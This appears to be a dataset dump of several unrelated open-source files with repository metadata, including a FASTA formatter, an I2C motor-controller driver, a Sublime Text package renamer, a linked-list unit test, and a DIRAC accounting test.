credentials from the environment.
transport (Union[str, ~.BigQueryWriteTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can |
EdinburghGenomics/clarity_scripts | scripts/assign_workflow_finance.py | Python | mit | 719 | 0.004172 | #!/usr/bin/env python
from EPPs.common import StepEPP, get_workflow_stage
class Assign | WorkflowFinance(StepEPP):
# All samples for the artifacts in the step will be queued to finance workflow
def _run(self):
artifacts_to_route = set()
for art in self.artifacts:
sample = art.samples[0]
artifacts_to_route.add(sample.artifact)
if artifacts_to_route:
# Only route artifacts if there are any
stage = get_workflow_stage(self.lims, "Finance - Invoicing EG 1.0", "Finance - Invoice To Be Sent")
| self.lims.route_artifacts(list(artifacts_to_route), stage_uri=stage.uri)
if __name__ == "__main__":
AssignWorkflowFinance().run()
|
tkchafin/scripts | fastaFormatter.py | Python | gpl-3.0 | 3,828 | 0.049373 | #!/usr/bin/python
import sys
import os
import getopt
from textwrap import wrap
def main():
params = parseArgs()
if params.many2one:
seqs=dict()
for f in read_fasta(params.many2one):
seqs[f[0]] = f[1]
write_fasta(params.out, seqs)
elif params.one2many:
seqs=dict()
for f in read_fasta(params.one2many):
seqs[f[0]] = f[1]
write_fasta(params.out, seqs, params.width)
#Function to write fasta-formatted sequences
def write_fasta(f, aln, width=None):
with open(f, 'w') as fh:
try:
for samp in aln.keys():
if width:
ol = ">" + str(samp) + "\n"
chunks=wrap(aln[samp], width=width, break_on_hyphens=False, drop_whitespace=False)
for chunk in chunks:
ol=ol + str(chunk) + "\n"
else:
ol = ">" + str(samp) + "\n" + str(aln[samp]) + "\n"
fh.write(ol)
except IOError as e:
print("Could not read file %s: %s"%(f,e))
sys.exit(1)
except Exception as e:
print("Unexpected error reading file %s: %s"%(f,e))
sys.exit(1)
finally:
fh.close()
#Read samples as FASTA. Generator function
def read_fasta(fas):
if os.path.exists(fas):
with open(fas, 'r') as fh:
try:
contig = ""
seq = ""
for line in fh:
line = line.strip()
if not line:
continue
#print(line)
if line[0] | == ">": #Found a header line
#If we already loaded a contig, yield that contig and
#start loading a new one
if contig:
yield([contig,seq]) #yield
contig = "" #reset contig and seq
seq = ""
split_line = line.split()
contig = (split_line[0].replace(">",""))
else:
seq += line
#Iyield last sequence, if it has both a header and sequence
| if contig and seq:
yield([contig,seq])
except IOError:
print("Could not read file ",fas)
sys.exit(1)
finally:
fh.close()
else:
raise FileNotFoundError("File %s not found!"%fas)
#Object to parse command-line arguments
class parseArgs():
def __init__(self):
#Define options
try:
options, remainder = getopt.getopt(sys.argv[1:], 'h1:M:w:o:', \
["help", "one2many=","many2one=","width=","out="])
except getopt.GetoptError as err:
print(err)
self.display_help("\nExiting because getopt returned non-zero exit status.")
#Default values for params
#Input params
self.one2many=None
self.many2one=None
self.width=60
self.out="out.fas"
#First pass to see if help menu was called
for o, a in options:
if o in ("-h", "-help", "--help"):
self.display_help("Exiting because help menu was called.")
#Second pass to set all args.
for opt, arg_raw in options:
arg = arg_raw.replace(" ","")
arg = arg.strip()
opt = opt.replace("-","")
#print(opt,arg)
if opt == "h" or opt == "help":
continue
elif opt=="one2many" or opt=="1":
self.one2many=arg
elif opt=="many2one" or opt=="M":
self.many2one=arg
elif opt=="width" or opt=="w":
self.width=int(arg)
elif opt=="out" or opt=="o":
self.out=arg
else:
assert False, "Unhandled option %r"%opt
#Check manditory options are set
if not self.one2many and not self.many2one:
self.display_help("No files provided.")
def display_help(self, message=None):
if message is not None:
print()
print (message)
print ("\nfastaFormatter.py\n")
print("Author: Tyler K Chafin, University of Arkansas")
print ("Contact: tkchafin@uark.edu")
print ("Description:Right now just converts b/n multi-line and one-line fasta formats, might add later")
print("""
-1,--one2many : Path to fasta file to multi-line format
-M,--many2one : Path to fasta file to convert to one-line format
-w,--width : Characters per line for multi-line (default: 60)
-o,--out : Output file name (default=out.fas)
""")
print()
sys.exit()
#Call main function
if __name__ == '__main__':
main()
|
vnevoa/DiffTrike | SoapBox/sb_motor_njay.py | Python | gpl-3.0 | 8,501 | 0.030585 | #
# Copyright 2011 Vasco Nevoa.
#
# This file is part of DiffTrike.
#
# DiffTrike is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DiffTrike is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DiffTrike. If not, see <http://www.gnu.org/licenses/>.
#
# This module implements the electric motor driver and data extraction.
#
import struct, time, thread
import i2c_lib
# Bridge controller registers:
REG_COMMAND = 0 #RW, Special functions, see comments below.
REG_STATUS = 1 #RO, b0~b3: heartbeat, b4:over-current, b5:over-temperature, b6:busy, b7:?
REG_PWM = 2 #RW, b7: direction; b0~6: Speed [0, 10..117]
REG_BRIDGETEMP = 3 #RO, controller temperature, raw diode reading, inversely proportional [?]
REG_MOTORTEMP = 4 #RO, motor temperature, raw diode reading, inversely proportional [?]
REG_CURRENT = 5 #RO, motoring current, Real = Read / 10 [A]
REG_BATTVOLTAGE = 6 #RO, controller's power supply voltage, Real = Read / 10 + 10 [V]
REG_FW_VERSION = 7 #RO, firmware version
# REG_COMMAND available commands:
# eCmd_Reset = 0: Turn off all FETs and reinitialize controller pins.
# eCmd_SetI2cAddr = 1: Write I2C address (in REG_CURRENT) to EEPROM (#ifnotdef DISABLE_EEPROM_WRITE)
# eCmd_SetVref = 2: Write ADC Vref (REG_CURRENT * 10) in EEPROM (#ifnotdef DISABLE_EEPROM_WRITE)
# eCmd_GetVref = 3: Get ADC Vref from EEPROM
# eCmd_DoDoublePulseTest = 4: "Double Pulse", REG_PWM = length of 1st pulse [us], REG_CURRENT = length of pause [us] (#ifdef ENABLE_DOUBLE_PULSE)
MAX_PWM = 117.0
class I2CMotorBridge():
def __init__(self, name, filename, address, debug=False):
self.busy = False # microprocessor busy
self.alarm_I = False # overcurrent alarm
self.alarm_T = False # overtemperature alarm
self.i2c_ops = 0 # i/o total count
self.blockings = 0 # i/o fail count
self.I = 0.0 # current Motoring current :)
self.T = 0.0 # current Bridge temperature
self.mT = 0.0 # current Motor temperature
self.V = 0.0 # current Battery voltage
self.power = 0.0 # desired power from application
self.last_pwm = 0 # last effectively written PWM value
self.device = i2c_lib.I2CSlave(name, filename, address)
self.ongoing = False # i/o thread lifespan control
self.reset = False # did the bridge reset?
self.resets = 0 # how many times did the bridge reset?
self.name = name # friendly name
self.debug = debug # should I speak loudly?
self.shorted = False # are we short-circuiting the motor?
if self.test():
self.ongoing = True
thread.start_new_thread(self.ioPump, ())
else:
print "Device initialization failed. [%s]" % self.device.getId()
def __del__(self):
if self.ongoing: time.sleep(0.30)
def test(self):
try:
t0 = time.time()
self.refreshStatus()
t1 = time.time()
if self.debug: print "Firmware revision = %d, Read takes %0.1fms" % (self.fw, 1000*(t1-t0))
return True
except:
return False
def ioPump(self):
t0 = time.time()
self.i2c_ops = 0
busy = 0
clip = 0
temp = 0
self.resets = 0
self.shorts = 0
max_I = 0.0
min_V = 100.0
while self.ongoing:
# GET status:
try:
self.refreshStatus()
self.blockings = 0
if self.busy: busy += 1
if self.alarm_I: clip += 1
if self.alarm_T: temp += 1
if self.reset: self.resets += 1
if self.I > max_I: max_I = self.I
if self.V < min_V: min_V = self.V
except:
self.blockings += 1
# count all read attempts
self.i2c_ops += 1
# SET behavior:
try:
self.writePower()
self.blockings = 0
except:
self.blockings += 1
# count all write attempts
self.i2c_ops += 1
# PRINT cycle:
if self.debug:
t1 = time.time()
if ((t1 - t0) * 1000) > 1000:
t0 = t1
line = "%s:\n %d ios; %3.3f%% fail;" % (self.device.getId(), self.i2c_ops, 100.0*self.blockings/self.i2c_ops)
line += " pwm = %d%%;" % (self.power * 100.0)
if self.shorts > 0 :
line += " SCs = %d; " % self.shorts
line += " max curr = %2.1f A;" % max_I
line += " min volt = %2.1f V;" % min_V
if clip: line += " CLIP = %d;" % clip
if self.resets: line += " RESETS = %d;" % self.resets
print line + "\n"
clip = 0
self.resets = 0
self.shorts = 0
max_I = 0.0
min_V = 100.0
# SLEEP:
time.sleep(0.050) # 50ms -> 20 loops per second
# exit if we fail I/O for 0.1s (10 = 5 R + 5 W)
#if self.blockings > 10 :
# self.ongoing = False
def refreshStatus(self):
(a, b, c, d, e, f, g, h) = self.getRawData()
#print "%s %2x %2x %2x %2x %2x %2x %2x %2x" % (self.name, a, b, c, d, e, f, g, h)
if h != 27: # counts as a glitch
raise Exception("I2C garbage!")
# bridge forgot my order?
self.reset = (c != self.last_pwm)
# b = REG_STATUS
self.alarm_I = b & 0x10 # b4: current limited
# d = REG_BRIDGETEMP
self.T = (255.0 - d) # ???
# e = REG_MOTORTEMP
self.mT = (255.0 - e) # ???
# f = REG_CURRENT
self.I = f / 10.0 # Amp
# g = REG_BATTVOLTAGE
self.V = g / 10.0 + 10 # Volt
# h = REG_FW_VERSION
self.fw = h # firmware revision
def getCurrent(self):
return self.I # Ampere
def getTemperature(self):
return self.T # Celsius
def getMotorTemperature(self):
return self.mT # Celsius
def getVoltage(self):
return self.V # Volt
def setPower(self, desired): # [-1..1]
self.power = max(desired, -1.0)
self.power = min(desired, 1.0)
def getRawData(self):
self.device.seek(0) # seek to beginning of registers.
data = self.device.read(8)
return struct.unpack('BBBBBBBB', data) # dump all of them.
def writePower(self):
# if the IO pump stops, throw the towel.
if not self.ongoing :
raise Exception("No I/O pump!")
if abs(self.power) > 0.08:
# if power > 8%, we are motoring:
self.last_pwm = int(abs(self.power) * MAX_PWM)
if self.shorted :
self.device.write(REG_COMMAND, 0x7F, 0x80) # turn off braking
self.shorted = False
if self.power < 0 : self.last_pwm |= 0x80 # reverse direction
inv = int(0xFF & ~self.last_pwm) # binary complement as check
self.device.write(REG_PWM, inv, self.last_pwm)
else:
# if power < 8%, we are braking or curving:
# toggle short-circuiting = regenerative braking
if not self.shorted :
self.device.write(REG_COMMAND, 0x7E, 0x81) # turn on braking -> motor is brake, heats up
self.shorted = True
self.shorts += 1
else:
self.device.write(REG_COMMAND, 0x7F, 0x80) # turn off braking -> motor is generator, heats up, battery charges
self.shorted = False
# This is a simple test routine that only runs if this module is
# called directly with "python sb_motor_md03.py"
if __name__ == '__main__':
mL = I2CMotorBridge('LEFT', '/dev/i2c-1', 0x22, True)
mLok = mL.ongoin | g
mR = I2CMotorBridge('RIGHT', '/dev/i2c-1', 0x23, True)
mRok = mR.ongoing
pmin = -int(MAX_PWM/2)
pmax = int(MAX_PWM/2)
while mLok or mRok:
for i in range(0, pmax+1) + range(pmin, 1):
#print "Setting power = %d%%" % (100 * i/MAX_PWM)
| if mLok: mL.setPower(i/MAX_PWM)
if mRok: mR.setPower(i/MAX_PWM)
#if mLok: print "LEFT P %3d%%, B.T %3d, M.T %3d, I %2.1f A, U %2.1f V" % (mL.power*100, mL.getTemperature(), mL.getMotorTemperature(), mL.getCurrent(), mL.getVoltage())
#if mRok: print "RIGHT P %3d%%, B.T %3d, M.T %3d, I %2.1f A, |
koery/win-sublime | Data/Packages/Package Control/package_control/package_renamer.py | Python | mit | 5,516 | 0.003626 | import os
import time
import sublime
from .console_write import console_write
from .package_disabler import PackageDisabler
from .settings import pc_settings_filename, load_list_setting, save_list_setting
class PackageRenamer(PackageDisabler):
"""
Class to handle renaming packages via the renamed_packages setting
gathered from channels and repositories.
"""
def load_settings(self):
"""
Loads the list of installed packages
"""
settings = sublime.load_settings(pc_settings_filename())
self.original_installed_packages = load_list_setting(settings, 'installed_packages')
def rename_packages(self, installer):
"""
Renames any installed packages that the user has installed.
:param installer:
An instance of :class:`PackageInstaller`
"""
# Fetch the packages since that will pull in the renamed packages list
installer.manager.list_available_packages()
renamed_packages = installer.manager.settings.get('renamed_packages', {})
if not renamed_packages:
renamed_packages = {}
# These are packages that have been tracked as installed
installed_packages = list(self.original_installed_packages)
# There are the packages actually present on the filesystem
present_packages = installer.manager.list_packages()
case_insensitive_fs = sublime.platform() in ['windows', 'osx']
# Rename directories for packages that have changed names
for package_name in renamed_packages:
new_package_name = renamed_packages[package_name]
changing_case = package_name.lower() == new_package_name.lower()
# Since Windows and OSX use case-insensitive filesystems, we have to
# scan through the list of installed packages if the rename of the
# package is just changing the case of it. If we don't find the old
# name for it, we continue the loop since os.path.exists() will return
# true due to the case-insensitive nature of the filesystems.
has_old = False
if case_insensitive_fs and changing_case:
for present_package_name in present_packages:
if present_package_name == package_name:
has_old = True
break
if not has_old:
continue
# For handling .sublime-package files
package_file = os.path.join(sublime.installed_packages_path(),
package_name + '.sublime-package')
# For handling unpacked packages
package_dir = os.path.join(sublime.packages_path(), package_name)
if os.path.exists(package_file):
new_package_path = os.path.join(sublime.installed_packages_path(),
new_package_name + '.sublime-package')
package_path = package_file
elif os.path.exists(os.path.join(package_dir, 'package-metadata.json')):
new_package_path = os.path.join(sublime.packages_path(),
new_package_name)
package_path = package_dir
else:
continue
sublime.set_timeout(lambda: self.disable_packages(package_name, 'remove'), 10)
if not os.path.exists(new_package_path) or (case_insensitive_fs and changing_case):
sublime.set_timeout(lambda: self.disable_packages(new_package_name, 'install'), 10)
time.sleep(0.7)
# Windows will not allow you to rename to the same name with
# a different case, so we work around that with a temporary name
if os.name == 'nt' and changing_case:
temp_package_name = '__' + new_package_name
temp_package_path = os.path.join(sublime.packages_path(),
temp_package_name)
os.rename(package_path, temp_package_path)
package_path = temp_package_path
os.rename(package_path, new_package_path)
installed_packages.append(new_package_name)
console_write(u'Renamed %s to %s' % (package_name, new_package_name), True)
sublime.set_timeout(lambda: self.reenable_package(new_package_name, 'install'), 700)
else:
time.sleep(0.7)
installer.manager.remove_package(package_name)
message_string = u'Removed %s since package with new name (%s) already exists' % (
package_name, new_package_name)
console_write(message_string, True)
sublime.set_timeout(lambda: self.reenable_package(package_name, 'remove'), 700)
try:
installed_packages.remove(package_name)
except (ValueError):
pass
sublime.set_timeout(lambda: self.save_packages(installed_packages), 10)
def save_packages(self, installed_packages):
"""
Saves the list of installed packages (after having been appropriately
renamed)
:param installed_packages:
The new list of installed packages
"""
filename = pc_set | tings_filename()
settings = sublime.load_settings(filename)
save_list_setting(settings, filename, 'installed_packages',
installed_packages, s | elf.original_installed_packages)
|
Schevo/kiwi | examples/framework/hey/heyglade.py | Python | lgpl-2.1 | 194 | 0 | #!/usr/bin/env python
import gtk
from kiwi.ui.gadgets import quit_if_last
from kiwi.ui.views import BaseView
app = BaseView(gladefile="hey", delete_handler | =quit_if_last)
app.show()
gtk.main()
| |
TomasHofman/did | tests/test_did.py | Python | gpl-2.0 | 1,194 | 0.001675 | # coding: utf-8
""" Tests for the command line script """
from __future__ import unicode_literals, absolute_import
import os
import re
import did.cli
import did.utils
# Prepare path and config examples
PATH = os.path.dirname(os.path.realpath(__file__))
MINIMAL = did.base.Config.example()
EXAMPLE = "".join(open(PATH + "/../examples/config").readlines())
# Substitute example git paths for real life directories
EXAMPLE = re.sub(r"\S+/git/[a-z]+", PATH, EXAMPLE)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Minimal Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def test_help_minimal():
""" Help message with minimal config """
did.base.Config(config=MINIMAL)
try:
did.cli.main(["--help"])
except SystemExit:
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Example Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | ~~~~~~~~~~~~~~~~~~~~~~~~ | ~~~~~
def test_help_example():
""" Help message with example config """
did.base.Config(config=EXAMPLE)
try:
did.cli.main(["--help"])
except SystemExit:
pass
|
callowayproject/django-viewpoint | viewpoint/syndication/blogger/urls.py | Python | apache-2.0 | 2,338 | 0.003849 | # -*- coding: utf-8 -*-
"""Urls used in blogger API handling.
:Authors:
- Bruce Kroeze
"""
"""
New BSD License
===============
Copyright (c) 2008, Bruce Kroeze http://solidsitesolutions.com
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of SolidSite | Solutions LLC, Zefamily LLC nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR I | MPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__docformat__="restructuredtext"
BLOGGER_METHODS = (
# We list methods to be exposed in the form (<method path>, <xml-rpc name>,)
('banjo.blog.syndication.blogger.pub.delete_post', 'blogger.deletePost'),
('banjo.blog.syndication.blogger.pub.get_users_blogs', 'blogger.getUsersBlogs'),
('banjo.blog.syndication.blogger.pub.get_user_info', 'blogger.getUserInfo'),
('banjo.blog.syndication.blogger.pub.new_post', 'blogger.newPost'),
)
# TODO - maybe: implement the rest of the old blogger functions
# blogger.editPost
# blogger.getTemplate
# blogger.setTemplate
# blogger.getPost
# blogger.getRecentPosts
|
jantman/rebuildbot | rebuildbot/travis.py | Python | agpl-3.0 | 10,259 | 0.00039 | """
rebuildbot/travis.py
Wrapper around travispy
The latest version of this package is available at:
<https://github.com/jantman/rebuildbot>
################################################################################
Copyright 2015 Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
This file is part of rebuildbot.
rebuildbot is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
rebuildbot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with rebuildbot. If not, see <http://www.gnu.org/licenses/>.
The Copyright and Authors attributions contained herein may not be removed or
otherwise altered, except to add the Author attribution of a contributor to
this work. (Additional Terms pursuant to Section 7b of the AGPL v3)
################################################################################
While not legally required, I sincerely request that anyone who finds
bugs please submit them at <https://github.com/jantman/rebuildbot> or
to me via email, and that you send any contributions or improvements
either as a pull request on GitHub, or to me via email.
################################################################################
AUTHORS:
Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
################################################################################
"""
import time
import logging
from dateutil import parser
from datetime import timedelta, datetime
import pytz
from rebuildbot.exceptions import (PollTimeoutException, TravisTriggerError)
try:
from urllib import quote
except ImportError:
from urllib.parse import quote
from travispy import TravisPy
from travispy.travispy import PUBLIC
logger = logging.getLogger(__name__)
CHECK_WAIT_TIME = 10 # seconds to wait before polling for builds
POLL_NUM_TIMES = 6 # how many times to poll before raising exception
class Travis(object):
"""
ReBuildBot wrapper around TravisPy.
"""
def __init__(self, github_token):
"""
Connect to TravisCI. Return a connected TravisPy instance.
:param github_token: GitHub access token to auth to Travis with
:type github_token: str
:rtype: :py:class:`TravisPy`
"""
self.travis = | TravisPy.github_auth(github_token)
self.user = self.travis.user()
logger.debug("Authenticated to TravisCI as %s <%s> (user ID %s)",
self.user.login, self.user.email, self.user.id)
def get_repos(self, date_check=True):
"""
Return a list of all repo names for the current authenticated user. If
``date_check`` is True, only re | turn repos with a last build more
than 24 hours ago.
This only returns repos with a slug (<user_or_org>/<repo_name>) that
begins with the user login; it ignores organization repos or repos
that the user is a collaborator on.
:param date_check: whether or not to only return repos with a last
build more than 24 hours ago.
:type date_check: bool
:returns: list of the user's repository slugs
:rtype: list of strings
"""
repos = []
for r in self.travis.repos(member=self.user.login):
if not r.slug.startswith(self.user.login + '/'):
logger.debug("Ignoring repo owned by another user: %s", r.slug)
continue
build_in_last_day = False
try:
build_in_last_day = self.repo_build_in_last_day(r)
except KeyError:
logger.debug('Skipping repo with no builds: %s', r.slug)
continue
if date_check and build_in_last_day:
logger.debug("Skipping repo with build in last day: %s", r.slug)
continue
repos.append(r.slug)
logger.debug('Found %d repos: %s', len(repos), repos)
return sorted(repos)
def repo_build_in_last_day(self, repo):
"""
Return True if the repo has had a build in the last day, False otherwise
:param repo: Travis repository object
:rtype: bool
"""
now = datetime.now(pytz.utc)
dt = parser.parse(repo.last_build.started_at)
if now - dt > timedelta(hours=24):
return False
return True
def run_build(self, repo_slug, branch='master'):
"""
Trigger a Travis build of the specified repository on the specified
branch. Wait for the build repository's latest build ID to change,
and then return a 2-tuple of the old build id and the new one.
If the new build has not started within the timeout interval, the
new build ID will be None.
:param repo_slug: repository slug (<username>/<repo_name>)
:type repo_slug: string
:param branch: name of the branch to build
:type branch: string
:raises: PollTimeoutException, TravisTriggerError
:returns: (last build ID, new build ID)
:rtype: tuple
"""
repo = self.travis.repo(repo_slug)
logger.info("Travis Repo %s (%s): pending=%s queued=%s running=%s "
"state=%s", repo_slug, repo.id, repo.pending, repo.queued,
repo.running, repo.state)
last_build = repo.last_build
logger.debug("Found last build as #%s (%s), state=%s (%s), "
"started_at=%s (<%s>)",
last_build.number, last_build.id,
last_build.state, last_build.color, last_build.started_at,
self.url_for_build(repo_slug, last_build.id))
self.trigger_travis(repo_slug, branch=branch)
try:
new_id = self.wait_for_new_build(repo_slug, last_build.id)
except PollTimeoutException:
logger.warning("Could not find new build ID for %s within timeout;"
" will poll later." % repo_slug)
new_id = None
return (last_build.id, new_id)
def wait_for_new_build(self, repo_slug, last_build_id):
"""
Wait for a repository to show a new last build ID, indicating that the
triggered build has started or is queued.
This polls for the last_build ID every :py:const:`~.CHECK_WAIT_TIME`
seconds, up to :py:const:`~.POLL_NUM_TRIES` times. If the ID has not
changed at the end, raise a :py:class:`~.PollTimeoutException`.
:param repo_slug: the slug for the repo to check
:type repo_slug: string
:param last_build_id: the ID of the last build
:type last_build_id: int
:raises: PollTimeoutException, TravisTriggerError
:returns: ID of the new build
:rtype: int
"""
logger.info("Waiting up to %s seconds for build of %s to start",
(POLL_NUM_TIMES * CHECK_WAIT_TIME), repo_slug)
for c in range(0, POLL_NUM_TIMES):
build_id = self.get_last_build(repo_slug).id
if build_id != last_build_id:
logger.debug("Found new build ID: %s", build_id)
return build_id
logger.debug("Build has not started; waiting %ss", CHECK_WAIT_TIME)
time.sleep(CHECK_WAIT_TIME)
else:
raise PollTimeoutException('last_build.id', repo_slug,
CHECK_WAIT_TIME, POLL_NUM_TIMES)
def get_last_build(self, repo_slug):
"""
Return the TravisPy.Build object for the last build of the repo.
"""
return self.travis.repo(repo_slug).last_build
def trigger_travis(self, repo_slug, branch='master'):
"""
Trigger a TravisCI build of a specific branch of a |
johncosta/private-readthedocs.org | readthedocs/builds/urls.py | Python | mit | 741 | 0.009447 | from django.conf.urls.defaults import *
urlpatterns = patterns('builds.views',
url(r'^$',
'build_list',
name='builds_list'
),
| url(r'^(?P<project_slug>[-\w]+)/(?P<pk>\d+)/$',
'build_detail',
name='builds_detail'
),
| url(r'^(?P<username>\w+)/(?P<project_slug>[-\w]+)/(?P<pk>\d+)/$',
'legacy_build_detail',
name='legacy_builds_detail'
),
url(r'^(?P<project_slug>[-\w]+)/$',
'build_list',
name='builds_project_list'
),
url(r'^(?P<username>\w+)/(?P<project_slug>[-\w]+)/$',
'legacy_build_list',
name='legacy_builds_project_list'
),
url(r'^tag/(?P<tag>\w+)/$',
'build_list',
name='builds_tag_list'
),
)
|
bnsantos/python-junk-code | tests/lists/linkedListTest.py | Python | gpl-2.0 | 4,159 | 0.00024 | __author__ = 'bruno'
import unittest
import algorithms.lists.linkedList as LinkedList
class TestLinkedList(unittest.TestCase):
def setUp(self):
pass
def test_linked_list_1(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(5))
linked_list.add(LinkedList.Element(4))
linked_list.add(LinkedList.Element(3))
linked_list.add(LinkedList.Element(2))
linked_list.add(LinkedList.Element(1))
self.assertEqual(True, linked_list.remove(4))
self.assertEqual(True, linked_list.remove(3))
self.assertEqual(True, linked_list.remove(2))
self.assertEqual(True, linked_list.remove(1))
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(True, linked_list.empty())
def test_linked_list_2(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 11):
linked_list.add(LinkedList.Element(i))
self.assertEqual(False, linked_list.empty())
def test_linked_list_3(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 10):
linked_list.add(LinkedList.Element(i))
self.assertEqual(5, linked_list.find_m_to_last_element(5))
def test_linked_list_4(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
self.assertEqual(495, linked_list.find_m_to_last_element(5))
def test_linked_list_5(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(100):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(400, linked_list.count())
self.assertEqual(485, linked_list.find_m_to_last_element(15))
def test_linked_list_6(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(300):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(200, linked_list.count())
self.assertEqual(400, linked_list.find_m_to_last_element(100))
def test_linked_list_7(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(350):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(150, linked_list.count())
def test_linked_list_8(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(300):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(200, linked_list.count())
| for i in range(300, 500):
| self.assertEqual(True, linked_list.remove(0))
self.assertEqual(0, linked_list.count())
def test_linked_list_9(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(350):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(150, linked_list.count())
def test_linked_list_10(self):
linked_list = LinkedList.LinkedList(LinkedList.Element(0))
for i in range(1, 500):
linked_list.add(LinkedList.Element(i))
self.assertEqual(500, linked_list.count())
for i in range(500):
self.assertEqual(True, linked_list.remove(0))
self.assertEqual(0, linked_list.count())
self.assertEqual(False, linked_list.remove(0)) |
IlyaDjurin/django-shop | shop/migrations/0010_auto_20170325_1640.py | Python | mit | 729 | 0.001372 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-25 13:40
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migratio | ns.Migration):
dependencies = [
('shop', '0009_auto_20170325_1625'),
]
operations = [
migrations.AddField(
model_name='tovar_img',
name='tovar | _created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='tovar_img',
name='tovar_updated',
field=models.DateTimeField(auto_now=True),
),
]
|
fstagni/DIRAC | tests/Integration/AccountingSystem/Test_DataStoreClient.py | Python | gpl-3.0 | 1,561 | 0.019859 | """ This is a test of the chain
DataStoreClient -> DataStoreHandler -> AccountingDB
It supposes that the DB is present, and that the service is running
this is pytest!
"""
# pylint: disable=invalid-name,wrong-import-position
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.AccountingSystem.Client.DataStoreClient import gDataStoreClient
from DIRAC.AccountingSystem.Client.Types.DataOperation import DataOperation
gLogger.setLevel('DEBUG')
def createAccountingRecord():
accountingDict = {}
accountingDict['OperationType'] = 'putAndRegister'
accountingDict['User'] = 'system'
accountingDict['Protocol'] = 'DataManager'
accountingDict['RegistrationTime'] = 0.0
accountingDict['RegistrationOK'] = 0
accountingDict['RegistrationTotal'] = 0
accountingDict['Destination'] = 'se'
accountingDict['TransferTotal'] = 1
accountingDict['TransferOK'] = 1
accountingDict['TransferSize'] = 1
accountingDict['TransferTime'] = 0.0
accountingDict['FinalStatus'] = 'Successful'
accountingDict['Source'] = 'testSite'
oDataOperation = DataOperation()
oDataOperation.setValuesFromDict(account | ingDict)
